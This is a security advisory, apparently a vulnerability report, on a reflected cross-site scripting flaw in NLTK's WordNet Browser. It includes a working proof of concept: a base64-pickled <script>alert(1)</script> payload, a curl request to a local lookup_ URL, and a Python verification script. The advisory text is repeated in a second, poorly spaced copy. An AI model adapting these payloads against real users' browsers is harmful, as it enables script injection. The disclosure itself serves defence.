Summary
nltk.app.wordnet_app contains a reflected cross-site scripting issue in the lookup_... route. A crafted lookup_<payload> URL can inject arbitrary HTML/JavaScript into the response page because attacker-controlled word data is reflected into HTML without escaping. This impacts users running the local WordNet Browser server and can lead to script execution in the browser origin of that application.
Details
The vulnerable flow is in nltk/app/wordnet_app.py:
This is inconsistent with the search route, which does escape user input:
As a result, a malicious lookup_... payload can inject script into the response page.
The issue is exploitable because:
Reference.decode() accepts attacker-controlled base64-encoded pickle data for the URL state.
- The decoded
word is reflected into HTML without html.escape().
- The server is started with
HTTPServer(("", port), MyServerHandler), so it listens on all interfaces by default, not just localhost.
PoC
- Start the WordNet Browser in an isolated Docker environment:
docker run -d --name nltk-wordnet-web -p 8002:8002 \
nltk-sandbox \
python -c "import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8002, False)"
- Use the following crafted payload, which decodes to:
("<script>alert(1)</script>", {})
Encoded payload:
gAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4=
- Request the vulnerable route:
curl -s "http://127.0.0.1:8002/lookup_gAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4="
- Observed result:
The word or words '<script>alert(1)</script>' were not found in the dictionary.

I also validated the issue directly at function level in Docker:
import base64
import pickle
from nltk.app.wordnet_app import page_from_href
payload = base64.urlsafe_b64encode(
pickle.dumps(("<script>alert(1)</script>", {}), -1)
).decode()
page, word = page_from_href(payload)
print(word)
print("<script>alert(1)</script>" in page)
Observed output:
WORD= <script>alert(1)</script>
HAS_SCRIPT= True
Impact
This is a reflected XSS issue in the NLTK WordNet Browser web UI.
An attacker who can convince a user to open a crafted lookup_... URL can execute arbitrary JavaScript in the origin of the local WordNet Browser application. This can be used to:
- run arbitrary script in the browser tab
- manipulate the page content shown to the user
- issue same-origin requests to other WordNet Browser routes
- potentially trigger available UI actions in that local app context
This primarily impacts users who run nltk.app.wordnet_app as a local or self-hosted HTTP service and open attacker-controlled links.
References
Summary
nltk.app.wordnet_appcontains a reflected cross-site scripting issue in thelookup_...route. A craftedlookup_<payload>URL can inject arbitrary HTML/JavaScript into the response page because attacker-controlledworddata is reflected into HTML without escaping. This impacts users running the local WordNet Browser server and can lead to script execution in the browser origin of that application.Details
The vulnerable flow is in
nltk/app/wordnet_app.py:nltk/app/wordnet_app.py:144lookup_are handled as HTML responses:page, word = page_from_href(sp)nltk/app/wordnet_app.py:755page_from_href()callspage_from_reference(Reference.decode(href))nltk/app/wordnet_app.py:769word = href.wordnltk/app/wordnet_app.py:796wordis inserted directly into the HTML body:body = "The word or words '%s' were not found in the dictionary." % wordThis is inconsistent with the
searchroute, which does escape user input:nltk/app/wordnet_app.py:136word = html.escape(...)As a result, a malicious
lookup_...payload can inject script into the response page.The issue is exploitable because:
Reference.decode()accepts attacker-controlled base64-encoded pickle data for the URL state.wordis reflected into HTML withouthtml.escape().HTTPServer(("", port), MyServerHandler), so it listens on all interfaces by default, not justlocalhost.PoC
docker run -d --name nltk-wordnet-web -p 8002:8002 \ nltk-sandbox \ python -c "import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8002, False)"("<script>alert(1)</script>", {})Encoded payload:
curl -s "http://127.0.0.1:8002/lookup_gAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4="I also validated the issue directly at function level in Docker:
Observed output:
Impact
This is a reflected XSS issue in the NLTK WordNet Browser web UI.
An attacker who can convince a user to open a crafted
lookup_...URL can execute arbitrary JavaScript in the origin of the local WordNet Browser application. This can be used to:This primarily impacts users who run
nltk.app.wordnet_appas a local or self-hosted HTTP service and open attacker-controlled links.References